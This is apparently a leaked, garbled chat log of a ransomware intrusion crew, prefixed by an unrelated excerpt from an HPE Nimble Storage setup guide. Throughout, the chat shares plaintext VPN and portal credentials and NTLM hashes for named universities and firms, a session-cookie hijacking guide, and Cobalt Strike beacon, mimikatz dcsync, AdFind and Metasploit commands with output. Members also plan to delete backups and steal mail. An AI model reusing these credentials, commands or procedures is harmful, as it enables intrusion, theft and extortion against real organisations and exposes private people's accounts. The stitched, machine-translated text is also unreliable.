From the Windows Toolkit (NWT) page, click Software (64 bit) under Current Version. Note: For NimbleOS 3.4.0 and later, only a 64-bit package is available. Note: The Windows host must be on the same subnet as that of the array to be set up. Save the NWT installation package to your Windows host. The installation package has a name similar to Setup-NimbleNWT-x64.x.x.x.x.exe, where x64 is the supported microprocessor and x.x.x.x is the NWT version number. Download the latest HPE Nimble Storage Windows Toolkit Release Notes. Review the list of Windows Server hotfixes. Note: If you are installing HPE Nimble Storage Setup Manager alone, then no hotfixes are needed. However, the .NET framework requirements still apply. Hotfix requirements are mandatory for any Windows host in which the HPE Nimble Storage Connection Manager is used to connect to HPE Nimble Storage volumes.
https://infosight.hpe.com/InfoSight/media/cms/active/public/pubs_Windows_Integration_Guide_NWT_5_0_0.whz/nbt1481004374959.html
the machine is empty?
LEVASHENKO-PC: 192.168.0.22 mharper
is there a separate letter or is there a crack?
?yup
then they changed the 18th year
I specially went down to find something like that, I mean when the accesses were distributed the message was ancient
did you try this message as a password?
and from what date the message?
do you have his car? and you on his mail?
does not fit the account
that is the pass to the system account?
so you can work with it more quickly
do you have a topic on the forum on backups? if not, i advise you
then nimble, yes
right in one click the whole machine deletion there?
but that will put aside, it will come in handy then we need nimbled(yes8 not the server?[ ](https://mediaeveryone.com/group/waterway-com?msg=L8AyTRkJYFWbpwPjB) there's only 8 computers (total 8) it's a correspondence about nimbly and also tried all the passwords I know how many computers? and what's backups? also on bitdefender got there) here. see different ips) 209.222.97.50:10201 this is mine and I have no other.206....24[ ](https://mediaeveryone.com/channel/general?msg=9G9GPaySX5fNYHYD4) about itThat's what kind of a deed? What ip are you talking about) I have this deed for a long time, you gave it to me and asked me to write to you after setting up so you can make a snapshot and you can roll it back. Look even there is a softs kotryy you have not put) I have not configured access to your addy, I gave you ` own` I gave him to work with evo with a already configured vpnomvzaimno no, you what confuse that squeeze me) is myparu min@user3 you took? not me, mine `209.222.97.50:10101` who took my addy after # evo-com?and i don't get it give you a fresh build tulchyna then 20 mnahahaha second you don't have to go shashitvo first these copypastes devil's toy go all the buttons i need to write one option)can combine )@all i'm preparing you a guide to speed up work, you want to poke buttons in the tulch or copy from the guide?okily let someone tell you a few posts above on updating settings for someone who came to life)we still have 10 hours too early)ready to go to sleep now + we will have a general discussion on process optimization next week will be very busy, so I recommend you get some sleep this weekend if you need more than one, this is a separate special order1domain one, or will there be different?++understood? 
now everywhere use domain in https hosts (stager) ip domain you used to specify the domain in httpshosts in the settings koba little change all in the attention I have an announcement call everyone in the chatty cute sweetdalay i still in koba @user9 sit time why drag it out to replace there is nothing in google that sessions do not fly so if nothing in google, what do you say?why are you silent? I think nothing in google, but it does not fly there anything@user8 what's wrong with cobo? and herehttp://github.com/asciimoo/exrexhttps://www.passcape.com/password_recovery_maskхешкат can do this? https://github.com/hashcat/maskprocessorгугл no need to remind the fuckin' ping, then it's okay if not - remind me) so check the method known@tl1 try to pass any session in agesk.com i got nothing from last login, not from coba @user9 check how dirty is 1? i'm also in CRISPREGIONAL.ORG@user9? someone is not enough to get to ehiska than from putty to pull the cribs for #1-done-crispregional-org in passing at #0-dead-waterway-com checked to see if they're up or not. The situation since yesterday hasn't changeddrawing adinfo from trusts in #corp-televisa-com-mx so who's doing what? Fuck, everyone had it, but it fell off at different intervals[ ](https://mediaeveryone.com/channel/general?msg=BW3aGy9eQmo2mnQxF) were only in one cob?[ ](https://mediaeveryone.com/channel/general?msg=BW3aGy9eQmo2mnQxF) I don't see it fixing[ ](https://mediaeveryone.com/channel/general?msg=uM3C6eJm8Go9riDeu) yes, but while I was helping the other one, it fell off. you fixed it yourself and that's it[ ](https://mediaeveryone.com/channel/general?msg=uM3C6eJm8Go9riDeu) yes, user4 with it 2 no answer urgently plz, is it up and running? hello, some of the servers were restored in yesterday's see what's up? hello everyone https://ftuapps.dev/proxifier-standard-edition-3-42-x64-x86-keygen-portable/ ``from the machines where you can not go dump the craps through cme how are you progressing? 
good morning thank you all good night)https://hackware.ru/?p=11287LM:NTLMт e in this format takes hash yes? good morning all good morning good morning from tulsa on vintagekennet, only those that gave out in confu now all the dekki are running through StartW?backup kei still do not work but they were sitting there on the three went to the pile did not go to the pile I marathoned ufnet, simantek not among this pooladonado look for a scan po simantek not say verify this four simantek is not included?min10bya access to the terminal under the usual users only the client with the backup code does not let you go when the update will then detect 4/23 I will update now toolzion to delka swore when you checked?there's symantec eldrointeD there are 8 credits with each one there's no backups when you enter with the backups there's no backups in your face backups codes are generated in тхта so there's a million problems I just told you about backups you can solve them yourself but it's not possible to load the backup code can be deleted and you don't have to do it now or later sessions will expire at the end you decide if it will be there, the most likely will be available backupsadapokpon the essence should not be 2fatak you'll be on the vpnom to delete the code in the client profile settings are not after that on the webmorda i will be thrown out so?i will log into the client i will generate a backup code i will look i am talking about logging in through the client vpn what are you talking about?) 
so it when you log in from the client will drop out in the browssee the main thing then delete them as an option it is to log in through the client vpngenerate you can put them in one account and connect through vpn instead of 2 look in the settings profile is backup copesvir not a big choice so if the session is active will not be palevoe in their bookmarks to log in?ok until the session fires) and around again startup again now disconnect the browser session stuhlaguu and that's it changed the webcom to portaldobbed the session in b64 replaced the value specify what you needsaml rename but the incognito is not created it must be created no?the swap item should be there you look in the console in another tab ("47ZjFKx24Nj2h0UtZKX2OYnZLgRg05aX2SuaotVzrQg=") here's the guide Using a WEB browser to access - take the session from the script output, e.g. "47ZjFKx24Nj2h0UtZKX2OYnZLgRg05aX2SuaotVzrQg=" - Open the browser in incognito mode, open the developer's console (js-console) - Encode ID of the session in base64 >> btoa ("47ZjFKx24Nj2h0UtZKX2OYnZLgRg05aX2SuaotVzrQg=") [ENTER] "NDdaakZLeDI0TmoyaDBVdFpLWDJPWW5aTGdSZzA1YVgyU3Vhb3RWenJRZz0=" - type in URL https://target (redirects to https://target/cgi-bin/welcome) - go into the application/cookies in the console, add the cookie swap : NDdaakZLeDI0TmoyaDBVdFpLWDJPWW5aTGdSZzA1YVgyU3Vhb3RWenJRZz0= - in your browser (where .../cgi-bin/welcome) change URL to https://target/cgi-bin/portal - Access the resource under the user's session ``and you open it again after each attempt - close it.``Do you do it first in incognito mode from an anonymous browser?)and the log files from the old vpn do not have it? we did not get it so you have to go in through a session but I think it's from 2phase you're an expert on them) for you vpn [+] Leaking sessions to dump configuration. 
if i will not be there by this time and you have a deadlock, you can go home before one o'clock then i think there is a way to do something with relayda, there are about 6 dk and all are patched erogon also past? try all kinds of web services with scanners look forda, already tried 100 times to other pc's? there is a ghost of hope for sbmgost and ethernal? there is a ghost of hope for shulcitra also excch can't be seen noasharfineedr gave nothing? nothing at all?
well, there is another thing for 20k pc 0 services? more specifically nothing can be seen citra, vcenter, shul etc. there is almost 0 (refer to services within the network) well in general we have a deadlock now in our network, maybe some other vectors you can suggest?tomorrow by 5 what a delight))) to 2 work with what we have today without sessions) to 10?)))) by how many sessions will be available? only 2 will be available, the other creeds are not valid (so do not turn off I ran across some that were available, they need to connect to turn off the winDFto yesterday have not finished? dig into snpartners.com. what's the task? 108.62.118.209 https://simvp.com - 104.194.11.10:50058 ZdAscYQ31DMSJ9EsJ4DcntCSrubZt9gRVyX yes and yes@user9 don't you have t eotclick in sessions? is this new?) i'll ask around and see if anyone has tried it elsewhere) i found the addressee's addressee codes and i'm just messing around with them. i read the docks too) there may be a differentiation of rights for some reason look at the docks for the suite I can't tell you, but it should be in the documentation.... I'm inside Veeam One monitor and I don't know how to delete backups...it seems to be a cloud version of Veeamclearance have you dealt with VeeamOne? I have! ``You did, but it's probably expired - it won't let me in.``Hi didn't they give you a Kmd5 account? no, they didn't) ``aac86ad4320f7cca879a87724c7d3647 ``need clears from Kmd5DC ``` Server Name IP Address ----------- ---------- Z1AD3 192.168.1.41 Z1AD2 10.10.0.2 Ok. 
reshoot it I would recommend that you reshoot the adinfo Till tomorrow, everyone will show extra sessions on this today that Group is not, so I'm writing here Brut finished, of course nothing was brutalized scanned more on skul, ftp, webs tomorrow the plan is to let ms17-010, but no credits, so I think the result will be the same as with smbot write to the group at what is over remember to send kerbs @tl2 I took kerbsort servers 63sh thought someday will go to the thousandth restart, but no, the system failed and now sometimes loads less:zany_face:I do not know their domain, while I am not online? meaning from the dedicam under wpn `unf.edu `? there is a LA hash and a bunch of computers where it fits, but it's all Windows 10 Educational I tried that hash on the servers and it didn't fit. All my sessions are dead and the domain is in the black. trying to enter the coboo, which broke yesterday from the tulchain's addfynd, hangs on about 90%, but every restart loads ~20 bytes more :thumbsup: on my got the VPN up - scanned the ip scanner from my ip/16 scanned the ports of the PCs I found, there are some with 445 let smb_login with the codes that are and . in the domain, in case there will be so what do you have at the end of the day? from 1:00am to 10:00pm to what time? please let me know how you are doing on the tasks give me an ip in a private message I can reload the dedic? put vnts and connect so) here is the link to the vpn, but after starting the vpn, the dedicle, apparently, goes beyond the vpn (when connected to the vpn just hangs RDP, after reconnecting RDP - vpn off.
After turning on the same goes for a VPN and hangs) will save a lot of time for those who do not have anything except LA Credits on a bunch of machines https://github.com/Hackndo/lsassy use this one take the time to set it up correctly once. so you have a set VPS on hand for this fuckin' thing right now https://vpn.floridapoly.edu austinwise0712 MechEng030796! ``` @user9 substituecan't you do anything fun in the settings? Is there any way to tunnel if there's no .cr download option? I tried the citrix.tmwcloud.com link and creeds, but the connection just hangs in the download. In citrix itself, all icons are disabled, everything is not available. https://citrix.tmwcloud.com/gti/auth/login.aspx mritchie Welcome01 ``` @user9 replacementwhat can you do with it?)[ ](https://mediaeveryone.com/channel/general?msg=oL6a59ZRrXQpcJ8sv) and here it's not clear, it's some kind of crm did not find a console or something where you can send commands or a file to cram Terminal Door Control - toggle switches open/close doors, vending and so on, write the status to the group https://www.emorycard.emory.edu/onecardwebadmin/operator/logon cwatson yourdoom23 ``` @user9 no substitute, empty nothing at all in the citra? @tl1 can i have a substitute? ipn does not come up and nothing can be taken out of the citra because there is nothing there.already createdhumboldt.edu external domain what? can i have a conf confina `AD.HUMBOLDT.EDU` output to confina then why is the output different? 
they are localgroup that not /domainlocalgroup /dom?[ ](https://mediaeveryone.com/channel/general?msg=qGXwKiGcGYSmbDoxQ) maximum strange design if you connect not through a browser it will hang[ ](https://mediaeveryone.com/channel/general?msg=Cm4AQuumDNbMoDprq) and it should ask the user to start the upa which I downloaded earlier@tl1 @tl2 What if I use net localgroup "administrators" /dom I get domain users with admin rules on the machine where I start it?[ ](https://mediaeveryone.com/channel/general?msg=cAmidLT3JooCsCNQE) a blank account, nothing in the zip it's not always clean, but you have to know it or you can uncheck your settings and it will show the path to the history Get-PSReadLineOption `````` History File Information. The default location for this file is $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt . ``How do you clean it up?`` Who else don't know if you can store command history on the system? https://vlab.humboldt.edu/rdweb/webclient/ vl77 M1lksh@ke ``` @user7 replacementa what do you have? https://apps.ufl.edu/citrix/xenappext/auth/login.aspx icebecky PeGjzXpnvx3Mjp$ ``` @user9 replacementwrite status please work in your confurdn will be ready by night, so you will issue it tomorrow. today we are working under current conditionsThis is good newszbs + so that in case of what you can roll it back I will make you a snapshot of the state immediately as you pick up your personal, change the password from the account and send me in a private note the new pass then configure your environment but the basic state soon - during the daymne 16)))there are 3 wine 10 and 3 wine 2016 ok! Glory to the great wars! 
you will soon be issued individual vindustadny granddisks by tasks in the confab immediately) I am close to a standstill I had a story yesterday on /16 on 445 from his sabinet, but nothing found) but it's like Everyone has a task?okkakak you remove the hashes at once jump to a couple of servers in addition)naturally)and whether the account is active at all and so check the validity firstOk, kerb I saw - will dtsink doCHalf an hour will come and if there are problems will lookmne need to leave for half an hour now will be, so just say, keep working on yesterday's tasks, you also have 4 dedics now, kobs and everything else the same@user4 you there kerb scrubbed) @tl2 to the conf conf conf skniulHi, not there yetAnybody here? All hello:space_invader:tomorrow by 2 today until 10```. System Boot Time: 12/28/2020, 12:01:39 PM ``He doesn't turn off the car? ====== AntiVirus ====== Engine : Spybot - Search and Destroy ProductEXE : C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe ReportingEXE : C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe Engine : Security Manager AV Defender Antimalware ProductEXE : C:\Program Files\N-able Technologies\AVDefender\WscRemediation.exe ReportingEXE : C:\Program Files\N-able Technologies\AVDefender\EPProtectedService.exe Engine : Windows Defender ProductEXE : windowsdefender:// ReportingEXE : %ProgramFiles%\Windows Defender\MsMpeng.exe ``12:03 PMav what?[ ](https://mediaeveryone.com/channel/general?msg=poHHucH2R6fwbP7Ss) seems like it should'' CurrentUser : WATERWAY\mharper Idletime : 01h:11m:03s:765ms (4263765 milliseconds) ``So isn't the session in keystrokes supposed to come up empty?``Isn't the keystrokes typing? 
On the contrary the hartbit is 0 and the session is still dead, so I don't write keylogger context user in svchost but the keylogger doesn't put it on the mharper new under the mharper user I found such a thing ``` https://store.vmware.com/,https://store.vmware.com/store/,10/7/2019 12:44:17 PM,13214943857640860,mharper@waterway.com,1Vanilla2 ``` he also had this in his sharpshooter output ``` http://192.168.0.43/,http://192.168.0.43/,10/21/2019 11:08:36 AM,13216147716516941,, ``` it's nimble, i.e. walks, but no credits( on the same computer found a password-protected file Passwords.xlsx, on the off chance I poked the administrator password, came up, nothing interesting now trying to open two aacdb-shek @tl1 Checked all available servers/arms everywhere KB stands, now go to the armies check the files, mb that will be. interesting @user3 otnick that you have on the results go to the guys (+ at all? no problem, tell the others that you can so time to waste) thank you okay? ``So I'll let go then?`` The first three have passed. ``I'll send you a list of all the users and hashes there is an option to check the list of hashes)))) how to 1? I check the hashes of dudes from the group "vpn users" and what are you doing? no more give you everything+++ right? we have @user3 with #evo-com @user8 with #1-done-korbel-com @user4 @user7 with #waterway-com which one of them should have admin rights there find the mail server - try the accts Da clarification of some circumstances, just lack of data on the network itself a what are these changes related to? as you go along, I think you'll figure it out, I think it's `/ecp` what is it exchange admin sektepoka there is an admin account on this EAC which provides mailboxes unloading find a server and look at it as a backups it is additional url on the server and like it `/ecp` what is it exchange admin sektepoka only 1 option of development kak what algorithm of actions after finding the servak itself? yes i think how to formulate the question on this point @user7 and @user8 tell me how to do the 3 point) yes, you) and yet) there is a question on these points i will not answer any more @all look here and write that you saw the message) we backups? 3 the point is clear? how do you download them later within the limits of gbling is clear, but backups are heavy. do we download?
so there are no questions later @all all saw? it's about what? + additional tasks nimbul like nimbul did not come, there's nothing moved? in the confines? ok, I would have that archive - came you under @user9 logged in? you seem to be in the confines help with waterway appendix is closed / shut down. I reinstalled it, so far it works, what's wrong with it? I'll give you the hashes above, you can check yes, YES long time ago should have changed, right? and stop ... YES these on kmd5 passed ``I think there's about domain authorization there.`` Are you trying to admin?
They changed their passwords a long time agohave a look for vpn / remote / offsite / partner groups similarwhen our process is complemented by the following actions: 1) remove backups listings up to 7 levels of nesting 2) whine file listings or table structures 3) Backup of mail server 4) fetch 3-4 file backups from the network, and immediately adinfodsink is in the archive above? and try to access these links, you need to pull from the ntds hashes of all users from the group associated with vpn://vpn.korbel.com/global-protect/login.espURL : https://vpn1.korbel.com/+webvpn+/index.htmlhttps://vpn2.korbel.com/global-protect/login.еѕрнужен 1 volunteer to korbel) even lessa in the confab? not much at all (here are such messages from the network, information about external accesses anything interesting there, in principle... and you need something specific? already looking at the question is important check it comptipo what, come to life? user9 should be nothing? backups listings, network architecture files-who left interesting files from #1-done-korbel-com ?so once again, to all the questions when some changes in the work he has something with the rock I @user4 not in the network today@user9 absent, so everything is in place, get it all vpna password what is it? 
zgLLMB1KXkzV6Dtn4GWQ8S49+accesses someone already have `104.171.123.166:45330` it's not new, but not too dirty+disassemble and report who got what2 clean`` 23.106.160.165 https://rawint.com ---------------------------------------------------------------------------------------- 172.93.109.18:51630 S36rQDbsTVH7D62swcBBexyxGkbNBFalsgx `````` 172.241.27.18 https://agesk.com ---------------------------------------------------------------------------------------- 209.222.97.8:62460 TnRLaHoRRRwyezbn6ybP1ed1xRlhtnAQAM5o ``in the work we have #waterway-com #evo-com I will give out two new clean the old koba is preparing to close and let's more distribute so then wait for everyone I'm hooked there for closing already, did not catch this momentkat some database files, structures, backups and other things it is not interesting)pinganut on it remained build and hosts Hey @user3 here, but you corbel no "interesting" files? + the rest are delayed? so zhesam as? Yes, with a disrupted sleep mode is not very restful Hey, all with the coming) as you relaxed?:space_invader:by the way on the second did not writepodlyayte connect to the guys `` `` ns1.risq.qc.ca ns2.risq.qc.ca dns2.dit.umontreal.ca dns1.dit.umontreal.ca ``` ``umontreal-ca.mail.protection.outlook.com it's all through nslookup got it, I can not normally shoot hell as I did not try to find the ldap server of all this only `dns1.dit.umontreal.ca ` pinged a while ago parsed ask colleagues how to do) no, I do not know their hosts, I wanted to pick up the car on which I could get, but I still could not remove the hell did you get into the domain? `AdFind.exe -b dc=umontreal, dc=ca -f "(objectcategory=computer)" > C:\Programdata\ad_computer.txt ` I put it in Windows IP Configuration Host Name . . . . . DESKTOP-VG9EH3G. Primary Dns Suffix . . . . : Node Type . . . . . . : Hybrid IP Routing Enabled . . . . No. WINS Proxy Enabled. .: No DNS Suffix Search List. . 
Ethernet adapter Local Area Connection* 10: Connection-specific DNS Suffix . : umontreal.ca Description . . . . . : Juniper Networks Virtual Adapter Physical Address . . . . . 02-05-85-7F-EB-80. DHCP Enabled. . . . . .: No Autoconfiguration Enabled . .: Yes Link-local IPv6 Address. : fe80::b5b3:c3a1:1be4:2c1e%51(Preferred) IPv4 Address . . . . .: 10.55.0.113(Preferred) Subnet Mask . . . : 255.255.255.255 Default Gateway . . . . : 0.0.0.0 DHCPv6 IAID . . . . : 855770501 DHCPv6 Client DUID . . . . : 00-01-00-01-27-59-8A-42-08-00-27-08-B7-A9 DNS Servers . . . . . : 10.120.31.31 10.120.184.31 Primary WINS Server . . . . : 10.113.2.14 NetBIOS over Tcpip. : Enabled Ethernet adapter Ethernet 4: Media state . . . . . . : Media disconnected Connection-specific DNS Suffix : Description . . . . . : Fortinet SSL VPN Virtual Ethernet Adapter Physical Address. . . . 00-09-0F-AA-00-01. DHCP Enabled . . . . : Yes Autoconfiguration Enabled . .: Yes Ethernet adapter Ethernet: Connection-specific DNS Suffix : Description . . . . . . : Intel(R) PRO/1000 MT Desktop Adapter Physical Address . . . . : 08-00-27-08-B7-A9. DHCP Enabled . . . . Yes Autoconfiguration Enabled. .: Yes Link-local IPv6 Address . : fe80::4413:17f2:dbd6:2eda%14(Preferred) IPv4 Address . . . . : 10.0.2.15(Preferred) Subnet Mask . . . . : 255.255.255.0 Lease Obtained. . . . : Tuesday, January 19, 2021 10:39:52 AM Lease Expires . . . . : Thursday, January 21, 2021 1:03:41 PM Default Gateway . . . . : 10.0.2.2 DHCP Server . . . . : 10.0.2.2 DHCPv6 IAID . . . . : 50855975 DHCPv6 Client DUID. . . . . : 00-01-00-01-27-59-8A-42-08-00-27-08-B7-A9 DNS Servers . . . . . : 10.120.31.31 10.120.184.31 NetBIOS over Tcpip. . . . .: Enabled Ethernet adapter Ethernet 2: Connection-specific DNS Suffix : Description . . . . . . : Intel(R) PRO/1000 MT Desktop Adapter #2 Physical Address . . . . .: 08-00-27-7C-42-6C. DHCP Enabled . . . . .: No Autoconfiguration Enabled. .: Yes Link-local IPv6 Address. 
: fe80::c969:48be:a7cc:3fdd%19(Preferred) IPv4 Address . . . . : 192.168.56.11(Preferred) Subnet Mask . . . : 255.255.255.0 Default Gateway . . . . : 192.168.56.1 DHCPv6 IAID . . . . . : 134742055 DHCPv6 Client DUID . . . . : 00-01-00-01-27-59-8A-42-08-00-27-08-B7-A9 DNS Servers . . . . . : 10.120.31.31 10.120.184.31 NetBIOS over Tcpip. . . . .: Enabled Ethernet adapter Ethernet 3: Media state . . . . . . : Media disconnected Connection-specific DNS Suffix : Description . . . . . . .: Fortinet Virtual Ethernet Adapter (NDIS 6.30) . Physical Address . . . . .: 00-09-0F-FE-00-01 DHCP Enabled . . . . Yes Autoconfiguration Enabled . .: Yes ``So wait a minute I do not quite understand about dns)``Are you doing it with a direct dns indication? Is it as I understood with dns something `LDAP Error 81(0x51): Server Down `` does it write when trying to remove the adfind while there are no questions? https://mydesktop.kingston.ac.uk/portal/webclient/index.html USER: k1945880@kingston.ac.uk PASS: Thanzeeh77 `````` https://vpn.umontreal.ca/dana-na/auth/url_default/welcome.cgi USER: p1204216 PASS: Des99714 ``lol, it's fixed.) no connection to the dk for a while the sessions stayed while connected to itc-us.com,kznm I got nowhere to go tried zerologon It seemed to work but it won't let me remove dcsync mimikatz lsadump::dcsync /dc:SS-Data2.Austin.SilencerShop.com /user:SilencerShop\krbtgt /authuser:SS-DATA2$ /authdomain:. 
/authpassword:"" /authntlm just doesn't output anything after running the command pth doesn't work because I don't have rights to run it Same as yesterday brute force attack didn't work I will try to dig into the networking hardware ``msf6 auxiliary(scanner/smb/smb_login) > set pass_file /home/acta/pwd7-12-utf.txt pass_file => /home/acta/pwd7-12-utf.txt msf6 auxiliary(scanner/smb/smb_login) > run [*] Scanned 4 of 22 hosts (18% complete) [*] Scanned 8 of 22 hosts (36% complete) [*] Scanned 8 of 22 hosts (36% complete) [*] Scanned 9 of 22 hosts (40% complete) [*] Scanned 11 of 22 hosts (50% complete) msf6 auxiliary(scanner/smb/smb_login) > options [*] Error: 192.168.1.137: RubySMB::Error::NegotiationFailure Unable to negotiate SMB1 with the remote host: Read timeout expired when reading from the Socket (timeout=30) [*] Scanned 14 of 22 hosts (63% complete) [*] Scanned 16 of 22 hosts (72% complete) [*] Scanned 18 of 22 hosts (81% complete) [*] Scanned 20 of 22 hosts (90% complete) [*] Scanned 22 of 22 hosts (100% complete) [*] Auxiliary module execution completed ``No progress so far. Charging brut smb https://github.com/Ridter/cve-2020-0688 https://github.com/zcgonvh/CVE-2020-0688 https://github.com/Yt1g3r/CVE-2020-0688_EXP The ``things''. Exploit and detect tools for CVE-2020-0688(Microsoft Exchange default MachineKeySection deserialize vulnerability I think they have it internally and look for their exh1) I don't think a reset will work under that 2) i don't think it will work under another account so if your user is already an admin here, on the nasa disabled interactions through utilities and it goes as fs100-102 you 3 hosts - NetApp with a large number of balls confused you 3 hosts what exactly - nasa? well smb_login says he there admin on the three that are abovea stop some local admin users group on the 3?at least on these machines where? so we have an admin jetak on this case need admin rights to the machine where you will reset) clearing no chance? 
password depends on something else most likely ablyahmnu I actually have two and alive, I will not check more until he hash on the two cars does not coincide `` `` Remote Support:1003:aad3b435b51404eeaad3b435b51404ee:5ce89fa1e9148477eb5d6aa455c2d494::: ``+ since there are 30k pk there is 100% exchange serverpk from the same group where rem sapp found check thisocgroup - OU=ocean or sabnet i would say subnet you mean subnet by group? 1 the group on satnets and users? webmordoy, satnets how so? mostly there satnets around 20a in their group?((almost 30kahahaha how many pc's in ad comps? + is there a point? smb_login have not tried it yesterday i tried to pull cars with it, not everything worked it did not roll in anywhere? yes, local`` Remote Support:1003:aad3b435b51404eeaad3b435b51404ee:295b43446eb7ee2c640e238481366061::: ``I don't think they went everywhere and changed it by the way this Remote Support is local as I remember Remote Support did not find a new one? before the change of the password it was a long time ago he collected them and with these all? 10.51.128.230 on two subnets there is only one car with rdp is closed at them? [*] 172.31.190.102:445 - Executing the command... [*] 172.31.190.102:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.31.190.102[\svcctl] ... [-] 172.31.190.102:445 - Unable to execute specified command: Failed to bind. Could not bind to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.31.190.102[\svcctl] [-] 172.31.190.102:445 - Unable to connect for cleanup: The server responded with an unexpected status code: STATUS_ACCESS_DENIED. Maybe you'll need to manually remove \WINDOWS\Temp\DmWDlRDmpcujzxcN.bat from the target. 
[*] 172.31.190.102:445 - Scanned 1 of 1 hosts (100% complete) `````` setg Proxies socks4:107.161.126.162:2914 ``and give sockshmm[vvv some load on it now just psexec? psexec_command``. beacon> shell wmic /node:172.31.190.100 /user:JDOSSN\nddevbernst /password:Tractor20! OS GET Name [*] Tasked beacon to run: wmic /node:172.31.190.100 /user:JDOSSN\ndevbernst /password:Tractor20! OS GET Name [+] host called home, sent: 114 bytes [+] received output: Node - 172.31.190.100 ERROR: Description = The RPC server is unavailable. ``a vmik?`` beacon> shell net use * \\\172.31.190.100\C$ /user:JDOSSN\nddevbernst Tractor20! [*] Tasked beacon to run: net use *\\\172.31.190.100\C$ /user:JDOSSN\nddevbernst Tractor20! [+] host called home, sent: 96 bytes [+] received output: System error 5 has occurred. Access is denied. 1) without the \ at the end 2) with a direct quote beacon> shell net use \\172.31.190.101!\C$\ [*] Tasked beacon to run: net use \\\172.31.190.101\C$\ [+] host called home, sent: 59 bytes [+] received output: System error 53 has occurred. The network path was not found. 
`````` beacon> net share \\\172.31.190.101 [*] Tasked beacon to run net share on 172.31.190.101 [+] host called home, sent: 104505 bytes [+] received output: Shares at \172.31.190.101: Share name Comment ---------- ------- ILPRARIESTATE_HD DHS_AVTEST WAWASHINGTON_HD WAWASHINGTON_EQARC TXSOUTH_HD TXSOUTH_EQARC TXRAYLEE_HD TXRAYLEE_EQARC TXQUALITY_HD TXQUALITY_EQARC TXBEPARTNERS_HD TXBEPARTNERS_EQARC TXAGPOWER_HD TXAGPOWER_EQARC TNRITCHIE_HD TNRITCHIE_EQARC TNGENERAL_HD Sybase_Shared SKMAPLEFARM_HD SKMAPLEFARM_EQARC SKJAYDEE_HD SKJAYDEE_EQARC SDGROSSENBURG_HD SDGROSSENBURG_EQARC SDAttachVol2 SDAttachVol1 rontest1$ QuorumFileWitnessA profvol2 profvol1 OHLESLIE_HD OHLESLIE_EQARC OHFINDLAY_HD OHFINDLAY_EQARC NYZAHMANDMATSON_EQARC NYCAZENOVIA_HD NYCAZENOVIA_EQARC NMPECOS_HD NMPECOS_EQARC NESTUTHEIT_HD NEGREENLINE_HD NEGREENLINE_EQARC NDLEADING_HD NDLEADING_EQARC NDGRAFTON_HD NDGRAFTON_EQARC NDDAKOTA_HD NDDAKOTA_EQARC NCSOUTHEASTFARM_HD NCSOUTHEASTFARM_EQARC NBGREENDIAMOND_HD NBGREENDIAMOND_EQARC MX_Shared MTFRONTLINEAGSOL_HD MTFRONTLINEAGSOL_EQARC MTFRONTLINE_HD MTFRONTLINE_EQARC MOJFROLING_HD MOHORIZON_HD MNMANKATO_HD MNHAUG_HD MNHAUG_EQARC MITRICOUNTY_HD MITRICOUNTY_EQARC MIDANDG_HD MIDANDG_EQARC MexicoHomeDir KYLIMESTONE_HD KYLIMESTONE_EQARC KSAMERICAN_HD KSAMERICAN_EQARC Keys$ JDISHomeDir JDIS_Shared JDIS_HD JDIS_EQARC ipc$ ILSAMPLE_HD ILPRAIRIESTATE_HD ILPRAIRIESTATE_EQARC ILNEFF_HD ILNEFF_EQARC ILMARTINSULLIVAN_HD ILMARTINSULLIVAN_EQARC ILKELLYSAUDERR_HD ILKELLYSAUDERR_EQARC ILJDISINFRASOL_HD ILJDISEQUIP_HD ILJDISEQUIP_EQARC ILITECERTLOADTEST_HD ILITECERT_HD ILITECERT2_HD ILHOLLAND_HD-path ILHOLLAND_HD ILHOLLAND_EQARC ILHOGANWALKER_HD ILDEMO_HD ILCROSS_HD ILCROSS_EQARC ILCITRATEST_HD ILARENDSBROS_HD ILARENDSBROS_EQARC ILARENDSAWE_HD ILARENDSAWE_EQARC ILARENDSANDSONS_HD ILARENDSANDSONS_EQARC iaworkshopvol IAWORKSHOP_HD IAWORKSHOP_EQARC IASCHENKELBERG_EQARC IAPHELPS_HD IAPHELPS_EQARC IAHULTGREN_HD IABRAKKE_HD IABRAKKE_EQARC IABODENSTEINER_HD IABODENSTEINER_EQARC 
FLSMITH_HD FLSMITH_EQARC FLHOBO_HD FLDOBBS_HD FLDOBBS_EQARC drtest DLR_Shared2 DLR_Shared1 dhsrepo DETAYLOR_HD DETAYLOR_EQARC DealerConfig COMVEQUIPMENT_HD COHONNEN_HD COHONNEN_EQARC channel_enviroment_support CATHOMASON_HD CASANJOAQUIN_EQARC CALAWRENCE_HD CALAWRENCE_EQARC CAFRESNO_HD CAFRESNO_EQARC CACALCOAST_HD CACALCOAST_EQARC c$ ARSWARK_HD ALSUNSOUTH_HD ALSUNSOUTH_EQARC admin$ ``but these cars are NetAppuser7okenet use?``No userpod normal what do you mean? and user7 here too check the validity of the cradag....... ``` beacon> shell dir \\172.31.190.100\C$\ProgramData [*] Tasked beacon to run: dir \\\172.31.190.100\C$\ProgramData [+] host called home, sent: 66 bytes [+] received output: Access is denied. beacon> shell dir \\172.31.190.101\C$\ProgramData [*] Tasked beacon to run: dir \\172.31.190.101\C$\ProgramData [+] host called home, sent: 66 bytes [+] received output: Access is denied. beacon> shell dir \\172.31.190.102\C$\ProgramData [*] Tasked beacon to run: dir \\172.31.190.102\C$\ProgramData [+] host called home, sent: 66 bytes [+] received output: Access is denied. `````` 172.31.190.100:445 (platform: 500 version: 5.0 name: NDHSNASC9102 domain: JDOSSN) 172.31.190.101:445 (platform: 500 version: 5.0 name: NDHSNASC9103 domain: JDOSSN) 172.31.190.102:445 (platform: 500 version: 5.0 name: NDHSNASC9014 domain: JDOSSN) `````` [+] 172.31.190.100:445 - 172.31.190.100:445 - Success: 'JDOSSN\nddevbernst:Tractor20!' Administrator [+] 172.31.190.101:445 - 172.31.190.101:445 - Success: 'JDOSSN\nddevbernst:Tractor20!' Administrator [+] 172.31.190.102:445 - 172.31.190.102:445 - Success: 'JDOSSN\nddevbernst:Tractor20!' Administrator ``On a subnet with DK polzak on three machines admin, I'll try to knock, maybe there YES passed by@tl1 ``` 10.51.128.122:25 (220 10.51.128.122 ESMTP Sendmail 8.14.3/8.14.3; Fri, 23 Oct 2020 15:53:27 -0500) 10.51.128.122:21 (220 (vsFTPd 2.2.2)) ``` any idea what to post here? 
